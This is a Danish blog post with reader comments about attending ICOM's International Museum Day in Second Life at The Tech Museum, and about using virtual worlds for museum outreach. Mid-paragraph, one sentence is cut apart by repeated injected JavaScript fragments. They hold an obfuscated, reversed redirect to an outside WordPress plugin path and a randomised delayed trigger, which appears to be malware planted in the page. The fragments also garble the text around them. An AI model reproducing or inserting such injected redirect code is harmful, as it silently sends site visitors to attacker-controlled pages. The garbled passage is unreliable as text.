Noter fra International Museum Day i Second Life

Charlotte/Charlotta havde været så venlig at informere mig om den internationale museumsdag i Second Life, arrangeret af ICOM. Den blev denne gang også holdt i Second Life ved The Tech Museum.

På forhånd virkede det en anelse mystisk, idet der – så vidt jeg kunne udrede – ikke var noget tidspunkt på dagen, hvor eventen skulle oprinde eller noget program. Det skulle være et heldagsarrangement, hvilket er et vidt begreb i Second Life, hvor hele kloden i princippet er repræsenteret med diverse tidszoner. Fra om formiddagen (dansk tid!) var der næsten ingen, men jeg fik spurgt mig frem til, at kl 18.00 (Paris-tid), ville der være en større sammenstimling.

Tilbage in-world igen klokken seks viste der sig nu at være rigtigt mange mødt frem. Avatarerne stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tod i en stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor flok foran ICOMs præsentationsstand (en afspillelig tale fra præsidenten, plakater, velkomst T-shirt, samovarer med “drikkevarer”!…). Det var ret svært – for ikke at sige umuligt – at holde styr på de mange chats, der foregik på kryds og tværs. En venlig ICOM-avatar trak nogle af os tilside, hvor hun viste os opstillingen med plakaterne fra sidste års arrangement. Min multitasking haltede lidt, men der var fra Iran og Frankrig bl.a. Det var ret tankevækkende. Senere satte vi os ned i en sofagruppe, hvor ICOM-avataren spurgte os om, hvad vi mente SL kunne bruges til i museumssammenhæng.

Flere nye kontakter blev skabt og tilsidst fulgtes vi ind i The Tech. Der en mere eksperimenterende afdeling, hvor forskellige kan afprøve deres digitale virtuelle udstillingsideer. “Museet” The Tech faldt nu lidt udenfor min opfattelse af begrebet, jeg ville nok have kaldt det et eksperimentarium. Hovedudstillingen pt. er da også om NASA (tror det er et jubilæum…)

Indtil videre synes jeg det var en brilliant ide og et super eksperiment, men at mange ting kan forbedres. Til en social event, tror jeg SL er velegnet, hvis man ikke har mulighed for at mødes i virkeligheden….måske ER nogle tinge faktisk også smartere/lettere at håndtere i SL..Det kræver tilvænning og tilretning – flere eksperimenter 😉

Kontakt mig gerne in-world. Mit avatarnavn er Avatine Fall.

PS. Det forlyder, at ICOM forbereder en film fra dagen

4 comments to “Noter fra International Museum Day i Second Life”
 1. Ja, jeg nåede desværre ikke rigtigt frem før ud på aftenen da der kun stod et par enlige avatarer tilbage i sandkassen og byggede bananer. Men tak til Rune – for det er faktisk ham der spottede eventet på ICOM´s hjemmeside – for tippet.

  Personligt tror jeg som sagt at der er en del muligheder i SL (eller måske rettere metaverser, pt. repræsenteret ved SL). Jeg vil meget gerne give en kort intro in-world, hvis nogen er interesserede, bl.a. kan I jo besøge Historiens hus, hvor Avatine/Helene i øjeblikket har en udstilling.
  så lav en avatar på http://www.secondlife.com og send mig en mail på privatmailen cshj@oncable.dk, så finder vi et tidspunkt.

  Jeg har iøvrigt også blogget lidt om et nyligt overstået restaureringsprojekt jeg har fået lov at lave på en kirke i SL http://www.charlotteshj.wordpress.com

 2. Jeg gjorde også forsøget, men hverken min arbejds-pc eller hjemme-mac havde lyst til at teleporte mig til The Tech. Men jeg tror der er fremtid i events på SL. Hvis man kunne finde på noget, som folk rigtig gerne ville se eller deltage i, og gjorde det i SL, f.eks. i Historiens Hus, ville det være en god promovering af 3D-fællesskaber i det hele taget. Nogen idéer?

 3. Jammen jeg kunne da forslå at vi kunne mødes i Historiens Hus og se på mulighederne. Hvis nogen har lyst til at prøve kræfter med mediet og lave fx foredrag eller udstilling, så er jeg med på den værste!

  Vi kan finde en dag og mødes in-world, og jeg viser meget gerne rundt i Historiens Hus og andre historiske steder!

  Det som er udfordringen er, at der for det første ikke er så mange danske avatarer lige for tiden. Man skal altså være indstillet på at have en del af sit publikum med sig, eller også at prøve at få fx engelsktalende avatarer som publikum. Hvis man skal have sine egne brugere med, så er der en vis indlæringskurve før det bliver sjovt for dem. Som “nyfødt” avatar bruger man jo en del tid på at karte rundt for at lære systemet at kende. Men hvis man bruger voicechat (har jeg ladet mig fortælle) er der jo gode muligheder i foredrag o.lign. (Jeg har problemer med mit headset).

  ….hov forresten: jeg har aftalt med Ulla (Hirshcprung) at lave en lille kunstudstilling om Zahrtmann og Leonora Christine. ….det er jo ganske vist og godtnok noget med kunst – men da også med historie 😉

Skriv et svar